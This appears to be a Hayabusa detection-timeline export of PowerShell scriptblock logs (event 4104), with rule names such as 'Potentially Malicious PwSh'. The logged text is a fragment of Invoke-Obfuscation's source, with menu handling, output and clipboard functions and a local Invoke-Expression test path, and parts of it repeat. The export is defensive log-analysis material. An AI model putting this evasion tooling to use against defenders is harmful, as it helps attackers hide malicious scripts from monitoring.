If(($Script:ObfuscatedCommand -ceq $ObfuscatedCommandBefore) -AND ($MenuName.StartsWith('_Token_'))) { Write-Host ""`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" There were not any"" -NoNewLine If($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).ToLower() -ne 'all') {Write-Host "" $($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1))"" -NoNewLine -ForegroundColor Yellow} Write-Host "" tokens to further obfuscate, so nothing changed."" } Else { # Add to $Script:ObfuscatedCommandHistory if a change took place for the current ObfuscatedCommand. $Script:ObfuscatedCommandHistory += , $Script:ObfuscatedCommand # Convert UserInput to CLI syntax to store in CliSyntax variable if obfuscation occurred. $CliSyntaxCurrentCommand = $UserInput.Trim('_ ').Replace('_','\') # Add CLI command syntax to $Script:CliSyntax to maintain a history of commands to arrive at current obfuscated command for CLI syntax. $Script:CliSyntax += $CliSyntaxCurrentCommand # Add execution syntax to $Script:ExecutionCommands to maintain a history of commands to arrive at current obfuscated command. $Script:ExecutionCommands += ($CmdToPrint[0] + '$ScriptBlock' + $CmdToPrint[1]) # Output syntax of CLI syntax and full command we executed in above Switch block. Write-Host ""`nExecuted:`t"" Write-Host "" CLI: "" -NoNewline Write-Host $CliSyntaxCurrentCommand -ForegroundColor Cyan Write-Host "" FULL: "" -NoNewline Write-Host $CmdToPrint[0] -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta Write-Host $CmdToPrint[1] -ForegroundColor Cyan # Output obfuscation result. Write-Host ""`nResult:`t"" Out-ScriptContents $Script:ObfuscatedCommand -PrintWarning } } } } Else { Return $UserInput } } Else { If ($MenuInputOptionsShowHelp[0] -Contains $UserInput) {Show-HelpMenu} ElseIf($MenuInputOptionsShowOptions[0] -Contains $UserInput) {Show-OptionsMenu} ElseIf($TutorialInputOptions[0] -Contains $UserInput) {Show-Tutorial} ElseIf($ClearScreenInputOptions[0] -Contains $UserInput) {Clear-Host} # For Version 1.0 ASCII art is not necessary. #ElseIf($ShowAsciiArtInputOptions[0] -Contains $UserInput) {Show-AsciiArt -Random} ElseIf($ResetObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to reset."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to reset."" } Else { $Script:LauncherApplied = $FALSE $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @($Script:ScriptBlock) $Script:CliSyntax = @() $Script:ExecutionCommands = @() Write-Host ""`n`nSuccessfully reset ObfuscatedCommand."" -ForegroundColor Cyan } } ElseIf($UndoObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to undo."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to undo."" } Else { # Set ObfuscatedCommand to the last state in ObfuscatedCommandHistory. $Script:ObfuscatedCommand = $Script:ObfuscatedCommandHistory[$Script:ObfuscatedCommandHistory.Count-2] # Remove the last state from ObfuscatedCommandHistory. $Temp = $Script:ObfuscatedCommandHistory $Script:ObfuscatedCommandHistory = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ObfuscatedCommandHistory += $Temp[$i] } # Remove last command from CliSyntax. Trim all trailing OUT or CLIP commands until an obfuscation command is removed. $CliSyntaxCount = $Script:CliSyntax.Count While(($Script:CliSyntax[$CliSyntaxCount-1] -Match '^(clip|out )') -AND ($CliSyntaxCount -gt 0)) { $CliSyntaxCount-- } $Temp = $Script:CliSyntax $Script:CliSyntax = @() For($i=0; $i -lt $CliSyntaxCount-1; $i++) { $Script:CliSyntax += $Temp[$i] } # Remove last command from ExecutionCommands. $Temp = $Script:ExecutionCommands $Script:ExecutionCommands = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ExecutionCommands += $Temp[$i] } # If this is removing a launcher then we must change the launcher state so we can continue obfuscating. If($Script:LauncherApplied) { $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully removed launcher from ObfuscatedCommand."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully removed last obfuscation from ObfuscatedCommand."" -ForegroundColor Cyan } } } ElseIf(($OutputToDiskInputOptions[0] -Contains $UserInput) -OR ($OutputToDiskInputOptions[0] -Contains $UserInput.Trim().Split(' ')[0])) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Get file path information from compound user input (e.g. OUT C:\FILENAME.TXT). If($UserInput.Trim().Split(' ').Count -gt 1) { # Get file path information from user input. $UserInputOutputFilePath = $UserInput.Trim().SubString(4).Trim() Write-Host '' } Else { # Get file path information from user interactively. $UserInputOutputFilePath = Read-Host ""`n`nEnter path for output file (or leave blank for default)"" } # Decipher if user input a full file path, just a file name or nothing (default). If($UserInputOutputFilePath.Trim() -eq '') { # User did not input anything so use default filename and current directory of this script. $OutputFilePath = ""$ScriptDir\Obfuscated_Command.txt"" } ElseIf(!($UserInputOutputFilePath.Contains('\')) -AND !($UserInputOutputFilePath.Contains('/'))) { # User input is not a file path so treat it as a filename and use current directory of this script. $OutputFilePath = ""$ScriptDi",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"r\$($UserInputOutputFilePath.Trim())"" } Else { # User input is a full file path. $OutputFilePath = $UserInputOutputFilePath } # Write ObfuscatedCommand out to disk. Write-Output $Script:ObfuscatedCommand > $OutputFilePath If($Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host "".`nA Launcher has been applied so this script cannot be run as a standalone .ps1 file."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } ElseIf(!$Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } Else { Write-Host ""`nERROR: Unable to write ObfuscatedCommand out to"" -NoNewLine -ForegroundColor Red Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow } } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to write out to disk.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } } ElseIf($CopyToClipboardInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Copy ObfuscatedCommand to clipboard. # Try-Catch block introduced since PowerShell v2.0 without -STA defined will not be able to perform clipboard functionality. Try { $Null = [Reflection.Assembly]::LoadWithPartialName(""System.Windows.Forms"") [Windows.Forms.Clipboard]::SetText($Script:ObfuscatedCommand) If($Script:LauncherApplied) { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard.`nNo Launcher has been applied, so command can only be pasted into powershell.exe."" -ForegroundColor Cyan } } Catch { $ErrorMessage = ""Clipboard functionality will not work in PowerShell version $($PsVersionTable.PsVersion.Major) unless you add -STA (Single-Threaded Apartment) execution flag to powershell.exe."" If((Get-Command Write-Host).CommandType -ne 'Cmdlet') { # Retrieving Write-Host and Start-Sleep Cmdlets to get around the current proxy functions of Write-Host and Start-Sleep that are overloaded if -Quiet flag was used. . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine . ((Get-Command Start-Sleep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) 2 } Else { Write-Host ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage If($Script:CliSyntax -gt 0) {Start-Sleep 2} } } $Script:CliSyntax += 'clip' } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to copy to your clipboard.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" -NoNewLine } } ElseIf($ExecutionInputOptions[0] -Contains $UserInput) { If($Script:LauncherApplied) { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have applied a Launcher.`n Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForeGroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForeGroundColor Yellow Write-Host "" and paste into cmd.exe.`n Or enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForeGroundColor Yellow Write-Host "" to remove the Launcher from ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { If($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) {Write-Host ""`n`nInvoking (though you haven't obfuscated anything yet):""} Else {Write-Host ""`n`nInvoking:""} Out-ScriptContents $Script:ObfuscatedCommand Write-Host '' $null = Invoke-Expression $Script:ObfuscatedCommand } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have not set ScriptPath or ScriptBlock.`n Enter"" -NoNewline Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" to set ScriptPath or ScriptBlock."" } } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" You entered an invalid option. Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host "" for more information."" # If the failed input was part of $Script:CompoundCommand then cancel out the rest of the compound command so it is not further processed. If($Script:CompoundCommand.Count -gt 0) { $Script:CompoundCommand = @() } # Output all available/acceptable options for current menu if invalid input was entered. If($AcceptableInput.Count -gt 1) { $Message = 'Valid options for current menu include:' } Else { $Message = 'Valid option for current menu includes:' } Write-Host "" $Message "" -NoNewLine $Counter=0 ForEach($AcceptableOption in $AcceptableInput) { $Counter++ # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host $AcceptableOption -NoNewLine -ForegroundColor $ColorToOutput If(($Counter -lt $AcceptableInput.Length) -AND ($AcceptableOption.Length -gt 0)) { Write-Host ', ' -NoNewLine } } Write-Host '' } } } Return $UserInput.ToLower() } Function Show-OptionsMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays options menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-OptionsMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-OptionsMenu displays options menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-OptionsMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set potentially-updated script-level values in $Script:OptionsMenu before displaying. $Counter = 0 ForEach($Line in $Script:OptionsMenu) { If($Line[0].ToLower().Trim() -eq 'scriptpath') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptPath} If($Line[0].ToLower().Trim() -eq 'scriptblock') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptBlock} If($Line[0].ToLower().Trim() -eq 'commandlinesyntax') {$Script:OptionsMenu[$Counter][1] = $Script:CliSyntax} If($Line[0].ToLower().Trim() -eq 'executioncommands') {$Script:OptionsMenu[$Counter][1] = $Script:ExecutionCommands} If($Line[0].ToLower().Trim() -eq 'obfuscatedcommand') { # Only add obfuscatedcommand if it is different than scriptblock (to avoid showing obfuscatedcommand before it has been obfuscated). If($Script:ObfuscatedCommand -cne $Script:ScriptBlock) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand} Else {$Script:OptionsMenu[$Counter][1] = ''} } If($Line[0].ToLower().Trim() -eq 'obfuscationlength') { # Only set/display ObfuscationLength if there is an obfuscated command. If(($Script:ObfuscatedCommand.Length -gt 0) -AND ($Script:ObfuscatedCommand -cne $Script:ScriptBlock)) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand.Length} Else {$Script:OptionsMenu[$Counter][1] = ''} } $Counter++",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"r\$($UserInputOutputFilePath.Trim())"" } Else { # User input is a full file path. $OutputFilePath = $UserInputOutputFilePath } # Write ObfuscatedCommand out to disk. Write-Output $Script:ObfuscatedCommand > $OutputFilePath If($Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host "".`nA Launcher has been applied so this script cannot be run as a standalone .ps1 file."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } ElseIf(!$Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } Else { Write-Host ""`nERROR: Unable to write ObfuscatedCommand out to"" -NoNewLine -ForegroundColor Red Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow } } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to write out to disk.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } } ElseIf($CopyToClipboardInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Copy ObfuscatedCommand to clipboard. # Try-Catch block introduced since PowerShell v2.0 without -STA defined will not be able to perform clipboard functionality. Try { $Null = [Reflection.Assembly]::LoadWithPartialName(""System.Windows.Forms"") [Windows.Forms.Clipboard]::SetText($Script:ObfuscatedCommand) If($Script:LauncherApplied) { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard.`nNo Launcher has been applied, so command can only be pasted into powershell.exe."" -ForegroundColor Cyan } } Catch { $ErrorMessage = ""Clipboard functionality will not work in PowerShell version $($PsVersionTable.PsVersion.Major) unless you add -STA (Single-Threaded Apartment) execution flag to powershell.exe."" If((Get-Command Write-Host).CommandType -ne 'Cmdlet') { # Retrieving Write-Host and Start-Sleep Cmdlets to get around the current proxy functions of Write-Host and Start-Sleep that are overloaded if -Quiet flag was used. . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine . ((Get-Command Start-Sleep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) 2 } Else { Write-Host ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage If($Script:CliSyntax -gt 0) {Start-Sleep 2} } } $Script:CliSyntax += 'clip' } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to copy to your clipboard.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" -NoNewLine } } ElseIf($ExecutionInputOptions[0] -Contains $UserInput) { If($Script:LauncherApplied) { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have applied a Launcher.`n Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForeGroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForeGroundColor Yellow Write-Host "" and paste into cmd.exe.`n Or enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForeGroundColor Yellow Write-Host "" to remove the Launcher from ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { If($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) {Write-Host ""`n`nInvoking (though you haven't obfuscated anything yet):""} Else {Write-Host ""`n`nInvoking:""} Out-ScriptContents $Script:ObfuscatedCommand Write-Host '' $null = Invoke-Expression $Script:ObfuscatedCommand } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have not set ScriptPath or ScriptBlock.`n Enter"" -NoNewline Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" to set ScriptPath or ScriptBlock."" } } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" You entered an invalid option. Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host "" for more information."" # If the failed input was part of $Script:CompoundCommand then cancel out the rest of the compound command so it is not further processed. If($Script:CompoundCommand.Count -gt 0) { $Script:CompoundCommand = @() } # Output all available/acceptable options for current menu if invalid input was entered. If($AcceptableInput.Count -gt 1) { $Message = 'Valid options for current menu include:' } Else { $Message = 'Valid option for current menu includes:' } Write-Host "" $Message "" -NoNewLine $Counter=0 ForEach($AcceptableOption in $AcceptableInput) { $Counter++ # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host $AcceptableOption -NoNewLine -ForegroundColor $ColorToOutput If(($Counter -lt $AcceptableInput.Length) -AND ($AcceptableOption.Length -gt 0)) { Write-Host ', ' -NoNewLine } } Write-Host '' } } } Return $UserInput.ToLower() } Function Show-OptionsMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays options menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-OptionsMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-OptionsMenu displays options menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-OptionsMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set potentially-updated script-level values in $Script:OptionsMenu before displaying. $Counter = 0 ForEach($Line in $Script:OptionsMenu) { If($Line[0].ToLower().Trim() -eq 'scriptpath') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptPath} If($Line[0].ToLower().Trim() -eq 'scriptblock') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptBlock} If($Line[0].ToLower().Trim() -eq 'commandlinesyntax') {$Script:OptionsMenu[$Counter][1] = $Script:CliSyntax} If($Line[0].ToLower().Trim() -eq 'executioncommands') {$Script:OptionsMenu[$Counter][1] = $Script:ExecutionCommands} If($Line[0].ToLower().Trim() -eq 'obfuscatedcommand') { # Only add obfuscatedcommand if it is different than scriptblock (to avoid showing obfuscatedcommand before it has been obfuscated). If($Script:ObfuscatedCommand -cne $Script:ScriptBlock) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand} Else {$Script:OptionsMenu[$Counter][1] = ''} } If($Line[0].ToLower().Trim() -eq 'obfuscationlength') { # Only set/display ObfuscationLength if there is an obfuscated command. If(($Script:ObfuscatedCommand.Length -gt 0) -AND ($Script:ObfuscatedCommand -cne $Script:ScriptBlock)) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand.Length} Else {$Script:OptionsMenu[$Counter][1] = ''} } $Counter++",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"} # Output menu. Write-Host ""`n`nSHOW OPTIONS"" -NoNewLine -ForegroundColor Cyan Write-Host "" ::"" -NoNewLine Write-Host "" Yellow"" -NoNewLine -ForegroundColor Yellow Write-Host "" options can be set by entering"" -NoNewLine Write-Host "" SET OPTIONNAME VALUE"" -NoNewLine -ForegroundColor Green Write-Host "".`n"" ForEach($Option in $Script:OptionsMenu) { $OptionTitle = $Option[0] $OptionValue = $Option[1] $CanSetValue = $Option[2] Write-Host $LineSpacing -NoNewLine # For options that can be set by user, output as Yellow. If($CanSetValue) {Write-Host $OptionTitle -NoNewLine -ForegroundColor Yellow} Else {Write-Host $OptionTitle -NoNewLine} Write-Host "": "" -NoNewLine # Handle coloring and multi-value output for ExecutionCommands and ObfuscationLength. If($OptionTitle -eq 'ObfuscationLength') { Write-Host $OptionValue -ForegroundColor Cyan } ElseIf($OptionTitle -eq 'ScriptBlock') { Out-ScriptContents $OptionValue } ElseIf($OptionTitle -eq 'CommandLineSyntax') { # CLISyntax output. $SetSyntax = '' If(($Script:ScriptPath.Length -gt 0) -AND ($Script:ScriptPath -ne 'N/A')) { $SetSyntax = "" -ScriptPath '$Script:ScriptPath'"" } ElseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Script:ScriptPath -eq 'N/A')) { $SetSyntax = "" -ScriptBlock {$Script:ScriptBlock}"" } $CommandSyntax = '' If($OptionValue.Count -gt 0) { $CommandSyntax = "" -Command '"" + ($OptionValue -Join ',') + ""' -Quiet"" } If(($SetSyntax -ne '') -OR ($CommandSyntax -ne '')) { $CliSyntaxToOutput = ""Invoke-Obfuscation"" + $SetSyntax + $CommandSyntax Write-Host $CliSyntaxToOutput -ForegroundColor Cyan } Else { Write-Host '' } } ElseIf($OptionTitle -eq 'ExecutionCommands') { # ExecutionCommands output. If($OptionValue.Count -gt 0) {Write-Host ''} $Counter = 0 ForEach($ExecutionCommand in $OptionValue) { $Counter++ If($ExecutionCommand.Length -eq 0) {Write-Host ''; Continue} $ExecutionCommand = $ExecutionCommand.Replace('$ScriptBlock','~').Split('~') Write-Host "" $($ExecutionCommand[0])"" -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta # Handle output formatting when SHOW OPTIONS is run. If(($OptionValue.Count -gt 0) -AND ($Counter -lt $OptionValue.Count)) { Write-Host $ExecutionCommand[1] -ForegroundColor Cyan } Else { Write-Host $ExecutionCommand[1] -NoNewLine -ForegroundColor Cyan } } Write-Host '' } ElseIf($OptionTitle -eq 'ObfuscatedCommand') { Out-ScriptContents $OptionValue } Else { Write-Host $OptionValue -ForegroundColor Magenta } } } Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } } Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" 